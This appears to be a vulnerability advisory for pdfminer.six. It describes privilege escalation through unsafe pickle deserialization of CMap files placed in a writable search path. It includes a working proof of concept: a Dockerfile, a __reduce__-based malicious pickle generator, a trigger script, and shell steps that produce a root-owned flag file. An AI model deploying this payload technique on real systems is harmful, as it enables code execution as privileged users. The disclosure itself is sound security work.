- "details": "### Overview\n\nThis report **demonstrates a real-world privilege escalation** vulnerability in [pdfminer.six](https://github.com/pdfminer/pdfminer.six) due to unsafe usage of Python's `pickle` module for CMap file loading. \nIt shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.\n\n## Table of Contents\n\n- [Background](#background)\n- [Vulnerability Description](#vulnerability-description)\n- [Demo Scenario](#demo-scenario)\n- [Technical Details](#technical-details)\n- [Setup and Usage](#setup-and-usage)\n- [Step-by-step Walkthrough](#step-by-step-walkthrough)\n- [Security Standards & References](#security-standards--references)\n\n---\n\n## Background\n\n**pdfminer.six** is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's `pickle` module.\n\n> **Security Issue:** \n> If the CMap search path (`CMAP_PATH` or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious `.pickle.gz` file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.\n\n---\n\n### Vulnerability Description\n\n- **Component:** pdfminer.six CMap loading (`pdfminer/cmapdb.py`)\n- **Issue:** Loads and deserializes `.pickle.gz` files using Python's `pickle` module, which is unsafe for untrusted data.\n- **Exploitability:** If a low-privileged user can write to any directory in `CMAP_PATH`, they can execute code as the user running pdfminer, potentially root or a privileged service.\n- **Impact:** Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.\n\n### Demo Scenario\n\n**Environment:** \n- Alpine Linux (Docker container)\n- Two users: \n  - `user1` (attacker: 
low-privilege)\n  - `root` (victim: runs privileged PDF-processing script)\n- Shared writable directory: `/tmp/uploads`\n- `CMAP_PATH` set to `/tmp/uploads` for the privileged script\n- pdfminer.six installed system-wide\n\n**Attack Flow:** \n1. `user1` creates a malicious CMap file (`Evil.pickle.gz`) in `/tmp/uploads`.\n2. The privileged service (`root`) processes a PDF or calls `CMapDB.get_cmap(\"Evil\")`.\n3. The malicious pickle is deserialized, running arbitrary code as root.\n4. The exploit creates a flag file at `/root/pwnedByPdfminer` as proof.\n\n### Technical Details\n\n- **Vulnerability Type:** Insecure deserialization of untrusted data using Python's `pickle`\n- **Attack Prerequisites:** Attacker can write to a directory included in `CMAP_PATH`\n- **Vulnerable Line:** \n  ```python\n  return type(str(name), (), pickle.loads(gzfile.read()))\n  ```\n  *In `pdfminer/cmapdb.py`'s `_load_data` method*\n- **Source:** https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246\n- **Proof of Concept:** See `createEvilPickle.py`, `evilmod.py`, and `processPDF.py`\n\n**Exploit Chain:**\n- Attacker places a malicious `.pickle.gz` file in the CMap search path.\n- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.\n- Arbitrary code executes with the privileges of that process (root/service account).\n\n## Setup and Usage\n\n### 📁 Files\n#### </> Dockerfile\n```dockerfile\nFROM python:3.11-alpine\n\n# Create the low-privileged user and the shared upload directory\nRUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads\n\nWORKDIR /app\n\n# Install pdfminer.six\nRUN pip install --no-cache-dir pdfminer.six\n\n# Copy app files\nCOPY evilmod.py /app/evilmod.py\nCOPY createEvilPickle.py /app/createEvilPickle.py\nCOPY processPDF.py /app/processPDF.py\n\n# Set up permissions for demo\nRUN chmod 777 /tmp/uploads\n\n# Default: drop into a shell for demo instructions\nCMD [\"/bin/sh\"]\n```\n\n#### </> evilmod.py\n```python\nimport os\n\ndef evilFunc():\n    # Runs inside the victim process when the pickle is deserialized\n    with open(\"/root/pwnedByPdfminer\", \"w\") as f:\n        f.write(\"ROOTED by pdfminer pickle RCE\\n\")\n    # Return a dict shaped like CMap data so the load completes normally\n    return {\"CODE2CID\": {}, \"IS_VERTICAL\": False}\n```\n#### </> createEvilPickle.py\n```python\nimport pickle\nimport gzip\nfrom evilmod import evilFunc\n\nclass Evil:\n    def __reduce__(self):\n        # On unpickling, pickle calls evilFunc() with no arguments\n        return (evilFunc, ())\n\npayload = pickle.dumps(Evil())\nwith gzip.open(\"/tmp/uploads/Evil.pickle.gz\", \"wb\") as f:\n    f.write(payload)\n\nprint(\"Malicious pickle created at /tmp/uploads/Evil.pickle.gz\")\n```\n#### </> processPDF.py\n```python\nimport os\nfrom pdfminer.cmapdb import CMapDB\n\n# Point the CMap search path at the shared, attacker-writable directory\nos.environ[\"CMAP_PATH\"] = \"/tmp/uploads\"\n\n# Loading the CMap deserializes /tmp/uploads/Evil.pickle.gz\nCMapDB.get_cmap(\"Evil\")\n\nprint(\"CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\")\n```\n\n### Build and start the demo container\n\n```bash\ndocker build -t pdfminer-priv-esc-demo .\ndocker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo\n```\n\n### In the container, open two shells in parallel (or switch users in one)\n\n#### Shell 1 (Attacker: user1)\n```bash\nsu user1\ncd /app\npython createEvilPickle.py\n# Output: Malicious pickle created at /tmp/uploads/Evil.pickle.gz (file owned by user1)\n```\n\n#### Shell 2 (Victim: root)\n```bash\n# From a second terminal: docker exec -it pdfminer-demo /bin/sh (or run exit in Shell 1 to return to root)\ncd /app\npython processPDF.py\n# Output: CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\n```\n\n### Proof of escalation\n\n```bash\ncat /root/pwnedByPdfminer\n# 🏴 Output: ROOTED by pdfminer pickle RCE\n```\n\n## Step-by-step Walkthrough\n\n1. **user1** uses `createEvilPickle.py` to craft a malicious CMap pickle and place it in the shared upload directory.\n2. The **root** user runs a typical PDF-processing script, which loads CMap files from that directory.\n3. The exploit triggers, running arbitrary code as root.\n4. 
The attacker now has proof of code execution as root (and, in a real attack, could escalate further).\n\n## Security Standards & References\n\n- **OWASP Top 10:** \n  - [A08:2021 - Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)\n  - [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/) (by analogy, as it's code injection via deserialization)\n\n- **MITRE ATT&CK Techniques:** \n  - [T1055: Process Injection](https://attack.mitre.org/techniques/T1055/)\n  - [T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)\n",